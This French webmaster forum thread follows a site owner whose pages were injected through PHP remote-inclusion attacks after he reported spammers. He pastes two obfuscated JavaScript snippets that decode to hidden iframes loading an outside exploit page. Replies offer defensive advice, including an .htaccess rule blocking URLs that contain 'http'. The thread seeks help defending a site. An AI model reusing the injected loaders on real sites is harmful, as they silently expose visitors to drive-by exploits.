En s'attaquant au spaM on se fait Hacker son site

[afrolatino]

Depuis quelques jours j'ai fait declaration de spaM sur
http://www.spam-rbl.com
http://www.spamcop.net
https://www.signal-spam.fr

je me fait pirater mon site www.afrolatino.net par intrusion de php
en introduisant du code javascript sur Tous les fichiers index.htm index.html et index.php de tous les repertoires

voici le code qui a ete rajouté

<!-- ~ --><SCRIPT LANGUAGE="JavaScript"> 
<!-- 
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!119!119!119!46!98!97!49!111!110!46!105!110!102!111!47!115!112!108!47!105!110!100!101!120!46!112!104!112!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} 
//--> 
</SCRIPT><SCRIPT LANGUAGE="JavaScript"> 
<!-- 
Decode(); 
//--> 
</SCRIPT><!-- ~ -->

et celui-ci quelque jours avant (celui-ci l'antivirus le detecte comme EXPLOIT-IFRAME)

<script>function v47c1628943055(v47c162894381f){ var v47c1628943feb=16; 
return(parseInt(v47c162894381f,v47c1628943feb));}
function v47c1628944f8b(v47c162894575a){ function v47c1628946ec8 () {var v47c162894769a=2;
 return v47c162894769a;} var v47c1628945f29='';for(v47c16289466fa=0; v47c16289466fa<v47c162894575a.length; 
v47c16289466fa+=v47c1628946ec8()){ v47c1628945f29+=(String.fromCharCode(v47c1628943055(v47c162894575a.substr(v47c16289466fa, v47c1628946ec8()))));}
return v47c1628945f29;} document.write(v47c1628944f8b('3C696672616D65206E616D653D273527207372633D27687474703A2F2F6261316F6E2E696E666F2F73706C27207
7696474683D333138206865696768743D353036207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

A priori cela derange les spammer de le declarer
quelle est la faille qu'ils utilisent et comment puis je les empecher?

 

[Jeviensderio]

Il faut voir les scripts PHP et s'ils permettent de stocker des fichiers en les appelant avec des variables en paramètres.

 

[Serious]

coincidence.

 

[julk]

tu t'es fait hacher ton site ?
et sérieux je sais pas pourquoi tu t'es attaqué aux span même si moi aussi je préféré les div mais les pauvre ils y sont pour rien...

 

[julk]

désolé je pouvais pas me retenir

 

[afrolatino]

Il faut voir les scripts PHP et s'ils permettent de stocker des fichiers en les appelant avec des variables en paramètres.

euh il y a la possibilite de faire de upload de fichier
maintenant est ce que c'est du GET ou du POST je ne sais pas
la strure du site et une base de IPB 1.3

tu penses que c'est de cette facon quil rajoute du code en de de fichier php

sur mon portail les page utilise des fonction include n'est pas une voie de faille

de toute facon il est certain qu'ils utilisent une faille en pârametre dans l'url

 

[afrolatino]

désolé je pouvais pas me retenir

Ok j'ai corrigé le SPAN en SPAM

au fait tu verras que c'est pas vraiment marrant de se faire hacKer le Site sur lequel on bosse des heures des jours des mois et des années

mais bon je me fache pas

Pour info je recois par semaine plus 5000 mails de SPAM sur une dizaine de boite mail

 

[cthierry]

Pour info je recois par semaine plus 5000 mails de SPAM sur une dizaine de boite mail

Petit joueur :-D
Moi c'est par jour et bon a part le promo de viagra que je regarde pour trouver le plus offrant (je rigole ) tout passe par la moulinette antispam.
Petite recrudescence de mails russes en ce moment.

 

[bproductiv]

JAMAIS s'attaquer à plus fort que soi..ca finit mal en général

 

[afrolatino]

Est ce qu'il y a des personnes qui ont deja utilisé les site de declaration de SPAM comme ceux-ci
http://www.spam-rbl.com
http://www.spamcop.net
https://www.signal-spam.fr

spam-rbl.com spamcop.net envoi des mails d'avertissement au propriétaire des serveurs smtp

est ce que ces mails d'avertissements comportent le mail du destinataire de l'entete du mail SPAM? (dans ce cas, la plainte n'est pas anonyme et on peut avoir des represailles)

 

[bproductiv]

Faut vraiment avoir du temps à perdre quand même.
un spam c'est poubelle et on oublie.
Aucun moyen efficace pour lutter existe, alors faut laisser couler.

 

[afrolatino]

En moins d'une semaine j'ai eu au moins 972 attaques par injection de php

petite question technique

peut on bloquer au niveau du htaccess toute url qui contient ?=http://

 

[afrolatino]

Tenez voici le log ecremé de 972 d'injection de PHP

http://www.afrolatino.net/logattaque.txt

 

[Leonick]

peut on bloquer au niveau du htaccess toute url qui contient ?=http://

oui, avec

RewriteEngine on
RewriteRule (http|proxy) - [NC,F,L]

dans le htaccess, ça te retirera déjà une bonne partie, après, tu peux l'étoffer selon les types d'url autorisés sur ton site

 

[afrolatino]

peut on bloquer au niveau du htaccess toute url qui contient ?=http://

oui, avec

RewriteEngine on
RewriteRule (http|proxy) - [NC,F,L]

dans le htaccess, ça te retirera déjà une bonne partie, après, tu peux l'étoffer selon les types d'url autorisés sur ton site

salut

j'ai dans mon htaccess

ErrorDocument 401 http://www.afrolatino.net/
ErrorDocument 402 http://www.afrolatino.net/
ErrorDocument 403 http://www.afrolatino.net/
ErrorDocument 404 http://www.afrolatino.net/
RewriteEngine on 
Options +FollowSymlinks
RewriteRule (http|proxy|.txt) - [NC,F,L]

.... (a Leonick je t'ai envoyé par mp mon .htaccess complet )

ca marche sur http://www.afrolatino.net/logattaque.txt

mais j'ai l'impression que cela ne marche pas
http://www.afrolatino.net/forum/index.php?l=http://www
http://www.afrolatino.net/forum/index.p ... ://www.txt

 

[afrolatino]

Bienrevenue a WRI,

Son piratage etait au niveau d'acte de terrorisme
mais j'ai remarqué qu'il a beneficié d'aide a la resolution d'un passe droit qu'un simple webmaster n'aurait pu obtenir

meme sur le web il y a aussi un internet d'en haut et un internet d'en bas !!!

 

[Szarah]

Bienrevenue a WRI,

Son piratage etait au niveau d'acte de terrorisme
mais j'ai remarqué qu'il a beneficié d'aide a la resolution d'un passe droit qu'un simple webmaster n'aurait pu obtenir

meme sur le web il y a aussi un internet d'en haut et un internet d'en bas !!!

Dans tous les domaines, partout et depuis toujours, un tissu de liens soigneusement entretenus a toujours donné des privilèges.
Je ne vois pas ce que ça a d'étonnant.

Et en ce qui concerne un traitement de faveur de la part de GG, attendons de voir la réindexation et le retour des positions.

 

[Serious]

Bienrevenue a WRI, Son piratage etait au niveau d'acte de terrorisme

Elle etait ou, la terreur?

mais j'ai remarqué qu'il a beneficié d'aide a la resolution d'un passe droit qu'un simple webmaster n'aurait pu obtenir

quelle aide speciale? quel passe-droit? sois plus precis.

 

[frangolacci]

quelle aide speciale? quel passe-droit? sois plus precis.

Je remercie aussi toutes les personnes de Google en Europe et aux Etats-Unis que j’ai pu contacter et qui m’ont aidé (il est clair que sans eux il m’était impossible de reprendre le contrôle de mon compte Gmail et par la suite de tous mes autres noms de domaine…). Merci aussi Christophe pour avoir fait bouger les choses à Mountain View…

j'ai remarqué qu'il a beneficié d'aide a la resolution d'un passe droit qu'un simple webmaster n'aurait pu obtenir
meme sur le web il y a aussi un internet d'en haut et un internet d'en bas !!!

oui, mais il faut reconnaitre aussi qu'un petit site à beaucoup moins de chance de subir se genre d'attaque

 

[Jeviensderio]

Je ne vois pas de passe-droit la dedans. Tout webmaster dont le compte est piraté se doit de contacter le service concerné, en l'occurence Google. Et sans eux pas de récupération possible.